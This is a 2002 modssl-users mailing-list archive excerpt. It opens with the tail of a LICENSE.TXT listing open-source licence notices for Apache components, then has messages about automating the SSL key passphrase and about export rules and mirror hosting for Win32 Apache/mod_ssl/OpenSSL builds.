/* Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All
   rights reserved.

   License to copy and use this software is granted provided that it
   is identified as the "RSA Data Security, Inc. MD5 Message-Digest
   Algorithm" in all material mentioning or referencing this software
   or this function.

   License is also granted to make and use derivative works provided
   that such works are identified as "derived from the RSA Data
   Security, Inc. MD5 Message-Digest Algorithm" in all material
   mentioning or referencing the derived work.

   RSA Data Security, Inc. makes no representations concerning either
   the merchantability of this software or the suitability of this
   software for any particular purpose. It is provided "as is"
   without express or implied warranty of any kind.

   These notices must be retained in any copies of any part of this
   documentation and/or software.
 */

For the  srclib\apr\passwd\apr_md5.c component:

/*
 * This is work is derived from material Copyright RSA Data Security, Inc.
 *
 * The RSA copyright statement and Licence for that original material is
 * included below. This is followed by the Apache copyright statement and
 * licence for the modifications made to that material.
 */

/* MD5C.C - RSA Data Security, Inc., MD5 message-digest algorithm
 */

/* Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All
   rights reserved.

   License to copy and use this software is granted provided that it
   is identified as the "RSA Data Security, Inc. MD5 Message-Digest
   Algorithm" in all material mentioning or referencing this software
   or this function.

   License is also granted to make and use derivative works provided
   that such works are identified as "derived from the RSA Data
   Security, Inc. MD5 Message-Digest Algorithm" in all material
   mentioning or referencing the derived work.

   RSA Data Security, Inc. makes no representations concerning either
   the merchantability of this software or the suitability of this
   software for any particular purpose. It is provided "as is"
   without express or implied warranty of any kind.

   These notices must be retained in any copies of any part of this
   documentation and/or software.
 */
/*
 * The apr_md5_encode() routine uses much code obtained from the FreeBSD 3.0
 * MD5 crypt() function, which is licenced as follows:
 * ----------------------------------------------------------------------------
 * "THE BEER-WARE LICENSE" (Revision 42):
 *  wrote this file.  As long as you retain this notice you
 * can do whatever you want with this stuff. If we meet some day, and you think
 * this stuff is worth it, you can buy me a beer in return.  Poul-Henning Kamp
 * ----------------------------------------------------------------------------
 */

For the srclib\apr-util\crypto\apr_md4.c component:

 * This is derived from material copyright RSA Data Security, Inc.
 * Their notice is reproduced below in its entirety.
 *
 * Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All
 * rights reserved.
 *
 * License to copy and use this software is granted provided that it
 * is identified as the "RSA Data Security, Inc. MD4 Message-Digest
 * Algorithm" in all material mentioning or referencing this software
 * or this function.
 *
 * License is also granted to make and use derivative works provided
 * that such works are identified as "derived from the RSA Data
 * Security, Inc. MD4 Message-Digest Algorithm" in all material
 * mentioning or referencing the derived work.
 *
 * RSA Data Security, Inc. makes no representations concerning either
 * the merchantability of this software or the suitability of this
 * software for any particular purpose. It is provided "as is"
 * without express or implied warranty of any kind.
 *
 * These notices must be retained in any copies of any part of this
 * documentation and/or software.
 */

For the srclib\apr-util\include\apr_md4.h component:

 *
 * This is derived from material copyright RSA Data Security, Inc.
 * Their notice is reproduced below in its entirety.
 *
 * Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All
 * rights reserved.
 *
 * License to copy and use this software is granted provided that it
 * is identified as the "RSA Data Security, Inc. MD4 Message-Digest
 * Algorithm" in all material mentioning or referencing this software
 * or this function.
 *
 * License is also granted to make and use derivative works provided
 * that such works are identified as "derived from the RSA Data
 * Security, Inc. MD4 Message-Digest Algorithm" in all material
 * mentioning or referencing the derived work.
 *
 * RSA Data Security, Inc. makes no representations concerning either
 * the merchantability of this software or the suitability of this
 * software for any particular purpose. It is provided "as is"
 * without express or implied warranty of any kind.
 *
 * These notices must be retained in any copies of any part of this
 * documentation and/or software.
 */


For the srclib\apr-util\test\testdbm.c component:

/* ====================================================================
 * The Apache Software License, Version 1.1
 *
 * Copyright (c) 2000-2002 The Apache Software Foundation.  All rights
 * reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 *
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 *
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in
 *    the documentation and/or other materials provided with the
 *    distribution.
 *
 * 3. The end-user documentation included with the redistribution,
 *    if any, must include the following acknowledgment:
 *       "This product includes software developed by the
 *        Apache Software Foundation (http://www.apache.org/)."
 *    Alternately, this acknowledgment may appear in the software itself,
 *    if and wherever such third-party acknowledgments normally appear.
 *
 * 4. The names "Apache" and "Apache Software Foundation" must
 *    not be used to endorse or promote products derived from this
 *    software without prior written permission. For written
 *    permission, please contact apache@apache.org.
 *
 * 5. Products derived from this software may not be called "Apache",
 *    nor may "Apache" appear in their name, without prior written
 *    permission of the Apache Software Foundation.
 *
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED
 * WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
 * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
 * DISCLAIMED.  IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR
 * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
 * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
 * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
 * USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
 * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
 * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
 * OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 * ====================================================================
 *
 * This software consists of voluntary contributions made by many
 * individuals on behalf of the Apache Software Foundation.  For more
 * information on the Apache Software Foundation, please see
 * .
 *
 * This file came from the SDBM package (written by oz@nexus.yorku.ca).
 * That package was under public domain. This file has been ported to
 * APR, updated to ANSI C and other, newer idioms, and added to the Apache
 * codebase under the above copyright and license.
 */


For the srclib\apr-util\test\testmd4.c component:

 *
 * This is derived from material copyright RSA Data Security, Inc.
 * Their notice is reproduced below in its entirety.
 *
 * Copyright (C) 1990-2, RSA Data Security, Inc. Created 1990. All
 * rights reserved.
 *
 * RSA Data Security, Inc. makes no representations concerning either
 * the merchantability of this software or the suitability of this
 * software for any particular purpose. It is provided "as is"
 * without express or implied warranty of any kind.
 *
 * These notices must be retained in any copies of any part of this
 * documentation and/or software.
 */

For the srclib\apr-util\xml\expat\conftools\install-sh component:

#
# install - install a program, script, or datafile
# This comes from X11R5 (mit/util/scripts/install.sh).
#
# Copyright 1991 by the Massachusetts Institute of Technology
#
# Permission to use, copy, modify, distribute, and sell this software and its
# documentation for any purpose is hereby granted without fee, provided that
# the above copyright notice appear in all copies and that both that
# copyright notice and this permission notice appear in supporting
# documentation, and that the name of M.I.T. not be used in advertising or
# publicity pertaining to distribution of the software without specific,
# written prior permission.  M.I.T. makes no representations about the
# suitability of this software for any purpose.  It is provided "as is"
# without express or implied warranty.
#

For the srclib\pcre\install-sh component:

#
# Copyright 1991 by the Massachusetts Institute of Technology
#
# Permission to use, copy, modify, distribute, and sell this software and its
# documentation for any purpose is hereby granted without fee, provided that
# the above copyright notice appear in all copies and that both that
# copyright notice and this permission notice appear in supporting
# documentation, and that the name of M.I.T. not be used in advertising or
# publicity pertaining to distribution of the software without specific,
# written prior permission.  M.I.T. makes no representations about the
# suitability of this software for any purpose.  It is provided "as is"
# without express or implied warranty.

For the pcre component:

PCRE LICENCE
------------

PCRE is a library of functions to support regular expressions whose syntax
and semantics are as close as possible to those of the Perl 5 language.

Written by: Philip Hazel 

University of Cambridge Computing Service,
Cambridge, England. Phone: +44 1223 334714.

Copyright (c) 1997-2001 University of Cambridge

Permission is granted to anyone to use this software for any purpose on any
computer system, and to redistribute it freely, subject to the following
restrictions:

1. This software is distributed in the hope that it will be useful,
   but WITHOUT ANY WARRANTY; without even the implied warranty of
   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

2. The origin of this software must not be misrepresented, either by
   explicit claim or by omission. In practice, this means that if you use
   PCRE in software which you distribute to others, commercially or
   otherwise, you must put a sentence like this

     Regular expression support is provided by the PCRE library package,
     which is open source software, written by Philip Hazel, and copyright
     by the University of Cambridge, England.

   somewhere reasonably visible in your documentation and in any relevant
   files or online help data or similar. A reference to the ftp site for
   the source, that is, to

     ftp://ftp.csx.cam.ac.uk/pub/software/programming/pcre/

   should also be given in the documentation.

3. Altered versions must be plainly marked as such, and must not be
   misrepresented as being the original software.

4. If PCRE is embedded in any software that is released under the GNU
   General Purpose Licence (GPL), or Lesser General Purpose Licence (LGPL),
   then the terms of that licence shall supersede any condition above with
   which it is incompatible.

The documentation for PCRE, supplied in the "doc" directory, is distributed
under the same terms as the software itself.

End PCRE LICENCE


For the test\zb.c component:

/*                          ZeusBench V1.01
			    ===============

This program is Copyright (C) Zeus Technology Limited 1996.

This program may be used and copied freely providing this copyright notice
is not removed.

This software is provided "as is" and any express or implied waranties, 
including but not limited to, the implied warranties of merchantability and
fitness for a particular purpose are disclaimed.  In no event shall 
Zeus Technology Ltd. be liable for any direct, indirect, incidental, special, 
exemplary, or consequential damaged (including, but not limited to, 
procurement of substitute good or services; loss of use, data, or profits;
or business interruption) however caused and on theory of liability.  Whether
in contract, strict liability or tort (including negligence or otherwise) 
arising in any way out of the use of this software, even if advised of the
possibility of such damage.

     Written by Adam Twiss (adam@zeus.co.uk).  March 1996

Thanks to the following people for their input:
  Mike Belshe (mbelshe@netscape.com) 
  Michael Campanella (campanella@stevms.enet.dec.com)

*/

For the expat xml parser component:

Copyright (c) 1998, 1999, 2000 Thai Open Source Software Center Ltd
                               and Clark Cooper

Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
	
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
	
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

====================================================================

For the libeay32.dll, ssleay32.dll and certtool.exe components:


  LICENSE ISSUES
  ==============

  The OpenSSL toolkit stays under a dual license, i.e. both the conditions of
  the OpenSSL License and the original SSLeay license apply to the toolkit.
  See below for the actual license texts. Actually both licenses are BSD-style
  Open Source licenses. In case of any license issues related to OpenSSL
  please contact openssl-core@openssl.org.

  OpenSSL License
  ---------------

/* ====================================================================
 * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 *
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer. 
 *
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in
 *    the documentation and/or other materials provided with the
 *    distribution.
 *
 * 3. All advertising materials mentioning features or use of this
 *    software must display the following acknowledgment:
 *    "This product includes software developed by the OpenSSL Project
 *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
 *
 * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
 *    endorse or promote products derived from this software without
 *    prior written permission. For written permission, please contact
 *    openssl-core@openssl.org.
 *
 * 5. Products derived from this software may not be called "OpenSSL"
 *    nor may "OpenSSL" appear in their names without prior written
 *    permission of the OpenSSL Project.
 *
 * 6. Redistributions of any form whatsoever must retain the following
 *    acknowledgment:
 *    "This product includes software developed by the OpenSSL Project
 *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
 *
 * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
 * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
 * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
 * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
 * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
 * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
 * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
 * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
 * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
 * OF THE POSSIBILITY OF SUCH DAMAGE.
 * ====================================================================
 *
 * This product includes cryptographic software written by Eric Young
 * (eay@cryptsoft.com).  This product includes software written by Tim
 * Hudson (tjh@cryptsoft.com).
 *
 */

 Original SSLeay License
 -----------------------

/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
 * All rights reserved.
 *
 * This package is an SSL implementation written
 * by Eric Young (eay@cryptsoft.com).
 * The implementation was written so as to conform with Netscapes SSL.
 * 
 * This library is free for commercial and non-commercial use as long as
 * the following conditions are aheared to.  The following conditions
 * apply to all code found in this distribution, be it the RC4, RSA,
 * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
 * included with this distribution is covered by the same copyright terms
 * except that the holder is Tim Hudson (tjh@cryptsoft.com).
 * 
 * Copyright remains Eric Young's, and as such any Copyright notices in
 * the code are not to be removed.
 * If this package is used in a product, Eric Young should be given attribution
 * as the author of the parts of the library used.
 * This can be in the form of a textual message at program startup or
 * in documentation (online or textual) provided with the package.
 * 
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *    "This product includes cryptographic software written by
 *     Eric Young (eay@cryptsoft.com)"
 *    The word 'cryptographic' can be left out if the rouines from the library
 *    being used are not cryptographic related :-).
 * 4. If you include any Windows specific code (or a derivative thereof) from 
 *    the apps directory (application code) you must include an acknowledgement:
 *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
 * 
 * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 * 
 * The licence and distribution terms for any publically available version or
 * derivative of this code cannot be changed.  i.e. this code cannot simply be
 * copied and put under another distribution licence
 * [including the GNU Public Licence.]
 */


--------------030107040002090103040101--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 26 04:33:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA15346; Thu, 26 Sep 2002 04:32:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hawk.mail.pas.earthlink.net id EAA15340; Thu, 26 Sep 2002 04:31:48 +0200 (MET DST)
Received: from kermit.mail.pas.earthlink.net ([207.217.120.241] helo=kermit.psp.pas.earthlink.net)
	by hawk.mail.pas.earthlink.net with esmtp (Exim 3.33 #1)
	id 17uORN-0003aH-00
	for modssl-users@modssl.org; Wed, 25 Sep 2002 19:31:45 -0700
Received: (from nobody@localhost)
	by kermit.psp.pas.earthlink.net (8.10.2+Sun/8.10.2) id g8Q2Vjo00912
	for modssl-users@modssl.org; Wed, 25 Sep 2002 19:31:45 -0700 (PDT)
Date: Wed, 25 Sep 2002 19:31:45 -0700
From: "rmckeever"
To: modssl-users@modssl.org
Subject: passpharse starting https
Message-ID: 
X-Originating-IP: 209.129.155.253
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "rmckeever"
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

Im sure im not the only one that has ever asked this but couldnt really find
anything on google. 

What happens if you what to have your passphrase entered automatic when
starting https, especially if your not sitting at your system at 3am...

Thanks upfront...

Rob

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 26 04:47:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA15575; Thu, 26 Sep 2002 04:46:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from campbus.com id EAA15571; Thu, 26 Sep 2002 04:45:30 +0200 (MET DST)
Received: from campbus ([192.168.1.110])
	by campbus.com (8.9.3/8.9.3) with SMTP id WAA29552
	for ; Wed, 25 Sep 2002 22:17:04 -0400
Message-ID: <002f01c26506$5b9e37e0$6e01a8c0@cbs>
From: "Ken Campney" 
To: 
References:  <000f01c264fc$8f49a660$6e01a8c0@cbs> <3D92700F.90801@sympatico.ca>
Subject: Re: Crypto Export restrictions (was: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip)
Date: Wed, 25 Sep 2002 22:42:29 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ken Campney" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

No problem.

Actually the only information I was looking for was who
"Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip"
actually belonged to (is it Apache, OpenSSL, or Mod_ssl)

There are a few US mirrors setup on the modssl.org so it's just a matter of
making sure everything is setup correctly. (Don't need any un-expected
visitors)

You were correct, the disclamer used on both modssl.org and openssl.org is
pretty much all I need.

Who knows with any luck this file should have an additional home by the end
of the week..

Thanks for the provided information Chris.

Ken
----- Original Message -----
From: "hunter" 
To: 
Sent: Wednesday, September 25, 2002 10:25 PM
Subject: Re: Crypto Export restrictions (was:
Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip)


> Ken Campney wrote:
> > Everyone have their reading glasses on?
> >
> > In an effort to get to the meat of the issue without all the "mind
numbing"
> > legal double talk I made a couple of phone calls.
> > (I figured what the hell, they take what they want from my income, I'll
make
> > them regret answering the phone)
> >
> > I appears that since the module is going to be "free" to everyone who
> > wants/needs it the only thing that "may" need to be done is notifying
them
> > what the url is,
> > and provide a disclamer warning about export regulations.
> >
> > I still have a few things to read through though.
> >
> > I may need some information such as who wrote the app (company, etc).
*ideas
> > anyone??
> > (I'm new to OpenSSL and the various modules so excuse me if the answer
to
> > that is obvious)
> >
> > Once I get this figured out, the module should have an additional 1-14
> > download locations. (if desired)
> >
>
> Ken,
>
> This is great!
>
> For what it is worth there is a disclaimer on this page that may serve
> the purpose you describe in your comments.
>
> http://www.modssl.org/source/
>
> A good source of names for all of the parts can be found in the
> LICENSE.TXT from the Apache 2.0.42 build - I have included it as an
> attachment.
>
> Please let me know if there is anything else that I can do to assist
> you.  Thank you for taking the time to check on the export rules.
>
> Chris.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 26 04:54:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA15835; Thu, 26 Sep 2002 04:53:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from campbus.com id EAA15811; Thu, 26 Sep 2002 04:52:56 +0200 (MET DST)
Received: from campbus ([192.168.1.110])
	by campbus.com (8.9.3/8.9.3) with SMTP id WAA29571
	for ; Wed, 25 Sep 2002 22:24:31 -0400
Message-ID: <006701c26507$658cd4e0$6e01a8c0@cbs>
From: "Ken Campney" 
To: 
References:  <000f01c264fc$8f49a660$6e01a8c0@cbs> <3D92700F.90801@sympatico.ca> <002f01c26506$5b9e37e0$6e01a8c0@cbs>
Subject: Re: Crypto Export restrictions (was: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip)
Date: Wed, 25 Sep 2002 22:49:55 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ken Campney" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

ERRR.

Do I have the right file name?? lol

What ever the file name/names in need of a depot is, I'm assuming it was
"Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip"

Ken
----- Original Message -----
From: "Ken Campney" 
To: 
Sent: Wednesday, September 25, 2002 10:42 PM
Subject: Re: Crypto Export restrictions (was:
Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip)


> No problem.
>
> Actually the only information I was looking for was who
> "Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip"
> actually belonged to (is it Apache, OpenSSL, or Mod_ssl)
>
> There are a few US mirrors setup on the modssl.org so it's just a matter
of
> making sure everything is setup correctly. (Don't need any un-expected
> visitors)
>
> You were correct, the disclamer used on both modssl.org and openssl.org is
> pretty much all I need.
>
> Who knows with any luck this file should have an additional home by the
end
> of the week..
>
> Thanks for the provided information Chris.
>
> Ken
> ----- Original Message -----
> From: "hunter" 
> To: 
> Sent: Wednesday, September 25, 2002 10:25 PM
> Subject: Re: Crypto Export restrictions (was:
> Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip)
>
>
> > Ken Campney wrote:
> > > Everyone have their reading glasses on?
> > >
> > > In an effort to get to the meat of the issue without all the "mind
> numbing"
> > > legal double talk I made a couple of phone calls.
> > > (I figured what the hell, they take what they want from my income,
I'll
> make
> > > them regret answering the phone)
> > >
> > > I appears that since the module is going to be "free" to everyone who
> > > wants/needs it the only thing that "may" need to be done is notifying
> them
> > > what the url is,
> > > and provide a disclamer warning about export regulations.
> > >
> > > I still have a few things to read through though.
> > >
> > > I may need some information such as who wrote the app (company, etc).
> *ideas
> > > anyone??
> > > (I'm new to OpenSSL and the various modules so excuse me if the answer
> to
> > > that is obvious)
> > >
> > > Once I get this figured out, the module should have an additional 1-14
> > > download locations. (if desired)
> > >
> >
> > Ken,
> >
> > This is great!
> >
> > For what it is worth there is a disclaimer on this page that may serve
> > the purpose you describe in your comments.
> >
> > http://www.modssl.org/source/
> >
> > A good source of names for all of the parts can be found in the
> > LICENSE.TXT from the Apache 2.0.42 build - I have included it as an
> > attachment.
> >
> > Please let me know if there is anything else that I can do to assist
> > you.  Thank you for taking the time to check on the export rules.
> >
> > Chris.
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 26 07:50:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA19213; Thu, 26 Sep 2002 07:49:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts26-srv.bellnexxia.net id HAA19209; Thu, 26 Sep 2002 07:48:12 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.253])
          by tomts26-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20020926054808.CWYH21425.tomts26-srv.bellnexxia.net@sympatico.ca>
          for ; Thu, 26 Sep 2002 01:48:08 -0400
Message-ID: <3D929FA3.6050107@sympatico.ca>
Date: Thu, 26 Sep 2002 01:48:19 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Crypto Export restrictions (was: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip)
References:  <000f01c264fc$8f49a660$6e01a8c0@cbs> <3D92700F.90801@sympatico.ca> <002f01c26506$5b9e37e0$6e01a8c0@cbs> <006701c26507$658cd4e0$6e01a8c0@cbs>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Ken Campney wrote:
> ERRR.
> 
> Do I have the right file name?? lol
> 
> What ever the file name/names in need of a depot is, I'm assuming it was
> "Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip"
> 
> Ken
> ----- Original Message -----
> From: "Ken Campney" 
> To: 
> Sent: Wednesday, September 25, 2002 10:42 PM
> Subject: Re: Crypto Export restrictions (was:
> Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip)
> 
>
Ken,

I copied the filename conventions from the previous versions ... looked 
at them to see what they contain, so as to remain consistent.  A large 
number of people still want to use the Apache 1.3.26, with fixed OpenSSL 
- I am using Apache 2.0.40 (soon to move to 2.0.42).  I can make any 
version, but this is the most popular right now.  OpenSA has a nice 
distribution, but I have not checked to see what rev's they are at.

Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
- contains Apache 1.3.26 and Mod_SSL 2.8.10, binaries built with OpenSSL 
libs, etc.

Openssl-0.9.6g-Win32.zip
- contains only OpenSSL binaries

The parts are not so well integrated as they are with Apache 2.0.42.


Apache_2.0.42-OpenSSL_0.9.6g-Win32.zip

- contains all 3 parts
- Mod_SSL is built into Apache 2 and the make like to put the OpenSSL 
binaries into the Apache/bin directory.


Actual urls...

http://tor.ath.cx/~hunter/apache/Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
http://tor.ath.cx/~hunter/apache/Openssl-0.9.6g-Win32.zip

http://tor.ath.cx/~hunter/apache/Apache_2.0.42-OpenSSL_0.9.6g-Win32.zip 



I hope I did not misunderstood what you wanted ... (I talk too much)

Chris.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 26 08:05:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA19549; Thu, 26 Sep 2002 08:04:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts14-srv.bellnexxia.net id IAA19543; Thu, 26 Sep 2002 08:03:45 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.253])
          by tomts14-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20020926060343.OGQZ6222.tomts14-srv.bellnexxia.net@sympatico.ca>
          for ; Thu, 26 Sep 2002 02:03:43 -0400
Message-ID: <3D92A348.1040104@sympatico.ca>
Date: Thu, 26 Sep 2002 02:03:52 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
